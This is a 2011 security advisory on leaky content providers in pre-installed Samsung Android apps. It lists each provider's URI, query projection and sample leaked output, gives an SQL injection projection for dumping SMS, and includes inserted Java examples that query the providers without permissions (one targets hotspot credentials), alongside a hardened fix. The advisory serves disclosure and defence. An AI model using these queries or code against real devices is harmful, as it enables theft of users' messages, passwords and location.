Multiple Samsung (Android) Application Vulnerabilities - MWR Labs

PUBLIC

Multiple Samsung (Android) Application Vulnerabilities MWR InfoSecurity Advisory 13/12/2011

Package Name: Multiple pre-installed Samsung applications
Date: 13th December 2011
Affected Versions: Samsung Galaxy S2 (I9100XWKI4) – Android 2.3.4. Other models running these applications may be affected.
CVE Reference: None
Severity: High Risk
Authors: Tyrone Erasmus, Mike Auty (Channels SQLi)
Local/Remote: Local
Vulnerability Class: Android Content Providers
Vendor: Samsung
Vendor Response: Vendor updated all vulnerable software, and firmware releases after 13th March 2012 contain the fixes.

Description
Many Samsung applications are pre-installed by default on Samsung Android devices and cannot be removed by the user. Some of these applications make use of content providers which are implicitly exported by default (a <provider> element that does not set android:exported is exported on this platform version). As a result these content providers allow any other application on the device to request sensitive information and obtain it. This is cause for concern because a third-party application containing malicious code does not require any granted permissions in order to obtain sensitive information from these applications. Only applications disclosing potentially sensitive information are reported on in this document. The following applications allow the retrieval of sensitive information from their content providers without any granted permissions:

© MWR InfoSecurity

Package | Obtainable Information | Version
com.seven.z7 (Social Hub) | Email address, email password, email contents, instant messages | 7.52.10101
com.sec.android.socialhub (Social Hub) | Social networking messages | 2.00.00001
com.sec.android.im (IM) | Instant messages, IM contacts | 1.00.10201
com.android.providers.telephony (Dialer Storage) | SMS | 2.3.4
com.sec.android.provider.logsprovider (LogsProvider) | SMS, email contents, instant messages, social networking messages, call logs | 1.0
com.sec.android.widgetapp.weatherclock (AccuWeather.com) | Location | 11.06.27.01
com.sec.android.app.minidiary (MiniDiary) | Notes, photos, GPS coordinates | 1.0
com.sec.android.app.memo (Memo) | Notes | 1.0
com.sec.android.widgetapp.postit (Minipaper) | Notes | 1.0
com.osp.app.signin (Samsung account) | Encrypted account information | 1.0
com.android.providers.settings (Settings Storage) | Portable Wi-Fi hotspot credentials | 2.3.4

Impact
Malicious applications installed on the same device as the vulnerable applications could steal sensitive information from the user and transmit it back to the attacker.

Cause
These vulnerabilities are present because insufficient security permissions are set on the content provider section in each of the vulnerable application's AndroidManifest.xml file.


Interim Workaround
Avoid using the vulnerable applications if you do not have access to the firmware update. To clear information stored in these applications go to Settings->Applications->Manage Applications and press "Clear data" for each of them.

Access to a content provider is restricted by declaring permissions on its entry in AndroidManifest.xml:

... com.example.app"
    android:readPermission="com.example.app.provider.permission.READ"
    android:writePermission="com.example.app.provider.permission.WRITE" />

This means that an application wanting to read or write to this content provider needs to hold the stated permissions in order to do so. If no other application needs the provider, android:exported="false" removes outside access altogether; where a permission is used, it should be declared with android:protectionLevel="signature" so that an arbitrary third-party application cannot simply request it in its own manifest.


Technical Description
The following section is organised by the information that is obtainable by an unprivileged application. The premise of this section is that an application with no granted permissions can perform a query on the specified content providers in order to obtain the targeted information. When querying a content provider, methods are provided that allow the developer to construct SQL statements. The following is what the query method in Android looks like to a developer:

query(uri, projection, selection, selectionArgs, sortOrder)

These parameters are used at various points in a SQL statement to construct the query. This also means that SQL injection vulnerabilities are often present in these fields on content providers: a provider that concatenates the projection or selection strings into its statement executes whatever SQL the calling application supplies.
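The following is an added example, not code from the advisory or from Samsung, of the query an application with no permissions in its manifest can issue against an exported provider. It wraps ContentResolver.query() and renders whatever rows come back; the class ProviderDump and its method names are my own, and the Settings Storage URI and column names are the ones listed under Miscellaneous later in this advisory.

```java
import android.content.ContentResolver;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import java.util.ArrayList;
import java.util.List;

/**
 * Added example (not from the advisory): dumps rows from an exported
 * content provider. No <uses-permission> entry is needed when the target
 * provider is exported and declares no android:readPermission.
 */
public final class ProviderDump {

    /** Each row rendered as "column=value" pairs, in cursor column order. */
    public static List<String> query(Context ctx, String uri, String[] projection,
                                     String selection, String[] selectionArgs) {
        List<String> rows = new ArrayList<String>();
        ContentResolver resolver = ctx.getContentResolver();
        Cursor c = null;
        try {
            // query(uri, projection, selection, selectionArgs, sortOrder): the same
            // five parameters the advisory describes. A provider that pastes
            // projection or selection straight into SQL is injectable through them.
            c = resolver.query(Uri.parse(uri), projection, selection, selectionArgs, null);
            if (c == null) {
                return rows; // unknown authority, or the provider returned nothing
            }
            String[] cols = c.getColumnNames();
            while (c.moveToNext()) {
                StringBuilder sb = new StringBuilder();
                for (int i = 0; i < cols.length; i++) {
                    if (i > 0) sb.append(" | ");
                    sb.append(cols[i]).append('=').append(c.getString(i));
                }
                rows.add(sb.toString());
            }
        } catch (SecurityException e) {
            // Thrown when the provider is not exported or is guarded by a
            // readPermission this application lacks: the outcome the fix produces.
            rows.add("denied: " + e.getMessage());
        } finally {
            if (c != null) c.close();
        }
        return rows;
    }

    /** Hotspot credentials from Settings Storage, as listed in this advisory. */
    public static List<String> hotspotCredentials(Context ctx) {
        // "_" is a single-character wildcard in LIKE, so this matches
        // wifi_ap_ssid and wifi_ap_passwd; the value travels in selectionArgs.
        return query(ctx, "content://settings/secure",
                new String[] {"name", "value"},
                "name LIKE ?", new String[] {"wifi_ap_%"});
    }
}
```

Run from any Activity as ProviderDump.hotspotCredentials(this); on a fixed build the call returns the "denied" line instead of the rows.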

Email

Package: com.seven.z7 (Social Hub)
Information: Registered user accounts within Social Hub and their associated service.
Uri: content://com.seven.provider.email/accounts
Projection: user_name, provision_name
Response:
user_name | provision_name
[email protected] | Yahoo! Messenger
[email protected] | Yahoo! Mail

Package: com.seven.z7 (Social Hub)
Information: The password for instant messaging accounts within Social Hub. This password is often the same for the email account and IM account on services like Yahoo and Google.
Uri: content://com.seven.provider.email/dbprefs
Response:
_id | category | type | key | value | flags
...
242 | Account-6 | 5 | Z7_IM_CLIENT_SETTING_PASSWORD_STRING | Password123 | 0
...


Package: com.seven.z7 (Social Hub)
Information: Email messages.
Uri: content://com.seven.provider.email/emails
Projection: _id, _from, subject, body
Response:
_id | _from | subject | body
...
30 | [email protected] | Test subject | Email contents
...

Package: com.sec.android.provider.logsprovider (LogsProvider)
Information: Email messages.
Uri: content://logs/email_seven
Projection: messageid, address, m_subject, m_content
Response:
messageid | address | m_subject | m_content
...
30 | [email protected] | Test subject | Email contents
...

All email accounts registered in Social Hub have their email contents logged. This query to the logs content provider shows the same data as the com.seven.provider.email provider, except that even if the account is deregistered or removed from Social Hub, the logs still persist.

Instant Messages

Package: com.seven.z7 (Social Hub)
Information: Get all contacts.
Uri: content://com.seven.provider.im/contacts
Projection: contact
Response:
John
Paul
Susan


Package: com.seven.z7 (Social Hub)
Information: Get instant messages from Social Hub.
Uri: content://com.seven.provider.im/messages
Projection: _id, contact, account, body
Response:
_id | contact | account | body
...
14 | John | 6 | Hi, how are you?
...

Package: com.sec.android.provider.logsprovider (LogsProvider)
Information: Get the same instant message as above, except from the logs.
Uri: content://logs/im
Projection: account_id, name, m_content
Response:
account_id | buddy_name | message
...
6 | John | Hi, how are you?
...

The logs persist even after an IM account has been deregistered.

Package: com.sec.android.im (IM)
Information: Get the same instant message as above, except from the IM application itself.
Uri: content://com.tecace.app.convprovider
Projection: _id, accountId, buddy_name, message
Response:
_id | accountId | buddy_name | message
...
3 | -1 | null | Hi, how are you?
...


SMS

Package: com.android.providers.telephony (Dialer Storage)
Information: All SMS messages.
Uri: content://channels
Projection: * FROM sms;--
Response:
_id | thread_id | address | person | date | protocol | read | status | type | reply_path_present | subject | body | service_center | locked | error_code | seen | deletable | hidden | group_id | group_type | delivery_date
...
572 | 3 | +27821234567 | null | 1323444871859 | null | 1 | 0 | 2 | null | null | This is a message from me to you | null | 0 | 0 | 1 | 1 | 0 | null | null | 1323444881072
...

SQL injection exists within the projection and selection parameters for the channels content provider.
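As an added example (not code from the advisory, and not the source of the Samsung provider, which the advisory does not show), this is how a provider's query() can turn the projection and selection it receives into SQL: first in the concatenating form that makes the `* FROM sms;--` projection above return another table, then in a hardened form using SQLiteQueryBuilder with a projection map. It also serves the general description of query(uri, projection, selection, selectionArgs, sortOrder) in the Technical Description. The table name channels, its exposed columns and the class and method names are assumptions for the illustration.

```java
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.text.TextUtils;
import java.util.HashMap;
import java.util.Map;

/**
 * Added example (not from the advisory): a provider's query() in a vulnerable
 * and a hardened form. Table and column names are assumed for the illustration.
 * Whichever form is used, the <provider> element should also be declared with
 * android:exported="false" or an android:readPermission.
 */
public final class ChannelsQueries {

    private static final String TABLE = "channels";

    /** Builds the statement the vulnerable variant executes; returned for inspection. */
    public static String vulnerableSql(String[] projection, String selection) {
        String cols = (projection == null) ? "*" : TextUtils.join(", ", projection);
        String sql = "SELECT " + cols + " FROM " + TABLE;
        if (!TextUtils.isEmpty(selection)) {
            sql += " WHERE " + selection;
        }
        return sql;
    }

    /** Vulnerable: caller-controlled strings are pasted into the statement. */
    public static Cursor queryVulnerable(SQLiteDatabase db, String[] projection,
                                         String selection, String[] selectionArgs) {
        // projection = {"* FROM sms;--"} yields
        //   SELECT * FROM sms;-- FROM channels
        // SQLite compiles the first statement and treats the rest as a comment,
        // so the caller receives the sms table from a provider that exposes channels.
        return db.rawQuery(vulnerableSql(projection, selection), selectionArgs);
    }

    /** Column names the provider is willing to expose; anything else is rejected. */
    private static final Map<String, String> PROJECTION_MAP = new HashMap<String, String>();
    static {
        PROJECTION_MAP.put("_id", "_id");
        PROJECTION_MAP.put("address", "address");
        PROJECTION_MAP.put("body", "body");
    }

    /** Hardened: projection resolved through a whitelist, selection parameterised. */
    public static Cursor queryHardened(SQLiteDatabase db, String[] projection,
                                       String selection, String[] selectionArgs) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE);
        // With a projection map set, a requested column that is not a key of the map
        // makes query() throw IllegalArgumentException, so "* FROM sms;--" never
        // reaches SQL. This works on Android 2.3 as well.
        qb.setProjectionMap(PROJECTION_MAP);
        // API 14 and later: the selection is compiled as a sub-expression against
        // the table before use, which rejects statement-breaking input.
        qb.setStrict(true);
        // Belt and braces for older platforms: values belong in selectionArgs,
        // so a literal quote or statement separator in the selection is refused.
        if (selection != null && (selection.indexOf('\'') >= 0 || selection.indexOf(';') >= 0)) {
            throw new IllegalArgumentException("use ? placeholders with selectionArgs");
        }
        return qb.query(db, projection, selection, selectionArgs, null, null, null);
    }
}
```

Calling queryHardened with the advisory's projection throws before any SQL runs, while queryVulnerable returns the sms rows shown above; a caller that legitimately needs the body column still gets it through the map.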

Package: com.sec.android.provider.logsprovider (LogsProvider)
Information: First 50 characters of SMS messages.
Uri: content://logs/historys
Projection: number, m_content
Selection: number like '+%'
Response:
number | m_content
...
+27821234567 | This is a message from me to you
...


Social Networking Messages

Package: com.sec.android.socialhub (Social Hub)
Information: Messages from social networks.
Uri: content://com.sec.android.socialhub.unifiedinbox/messages
Projection: name, m_subject, m_content
Response:
name | m_subject | m_content
John Smith | Birthday | Are you coming to my party?

Notes

Package: com.sec.android.app.minidiary (MiniDiary)
Information: All notes entries, photos and photo locations.
Uri: content://com.sec.android.providers.minidiary.MiniDiaryData/diary
Projection: _id, location, date, longitude, latitude, picture_file, note
Response:
_id | location | date | longitude | latitude | picture_file | note
1 | Germany, Hesse | 2011.01.11 | 9804903 | 51115599 | /data/data/com.sec.android.app.minidiary/files/picture/1323636867660.jpg | Beautiful!

It should also be noted that, on this version of Android, the contents of the SD card are readable by any application without a permission, allowing applications to retrieve files stored there and upload them to an attacker.

Package: com.sec.android.app.memo (Memo)
Information: User notes stored in this application.
Uri: content://com.samsung.sec.android/memo/all
Projection: _id, title, content
Response:
_id | title | content
1 | 20111211 | Note contents


Package: com.sec.android.widgetapp.postit (Minipaper)
Information: User notes stored in this application.
Uri: content://com.sec.android.widgetapp.postit/postit
Projection: _id, body
Response:
_id | body
1 | My first postit!

Miscellaneous

Package: com.sec.android.socialhub (Social Hub)
Information: Name of the owner of the device.
Uri: content://com.sec.android.socialhub.unifiedinbox/sns_msg_receiver_map
Projection: receiver_name
Response:
Tyrone Erasmus

Package: com.sec.android.widgetapp.weatherclock (AccuWeather.com)
Information: General location of the owner of the device.
Uri: content://com.sec.android.widgetapp.weatherclock
Response:
NAME | STATE | LOCATION | MAIN_DISPLAY | SUMMER_TIME | LATITUDE | LONGITUDE | PROVIDER
Pretoria | Gauteng, South Africa | cityId:305449 | 1 | 0 | -25.7315 | 28.21821 | 0


Package: com.osp.app.signin (Samsung account)
Information: Obtain encrypted Samsung account settings.
Uri: content://com.osp.contentprovider.ospcontentprovider/identity
Response:
Key | Value
UserID | ...
EmailID | ...
Password | ...
MobileCountryCode | ...
AuthToken | ...
AuthTokenSecret | ...
BirthDate | ...
UserDeviceID | ...

Each value returned above is an encrypted string that has been base64 encoded. If the mechanism that encrypts and decrypts this data is found to be weak, the user's Samsung account would be compromised.

Package: com.android.providers.settings (Settings Storage)
Information: Portable Wi-Fi hotspot credentials.
Uri: content://settings/secure
Response:
_id | name | value
2736 | wifi_ap_passwd | h0tsp0tp@ssw0rd
...
2859 | wifi_ap_ssid | Hotspot1234
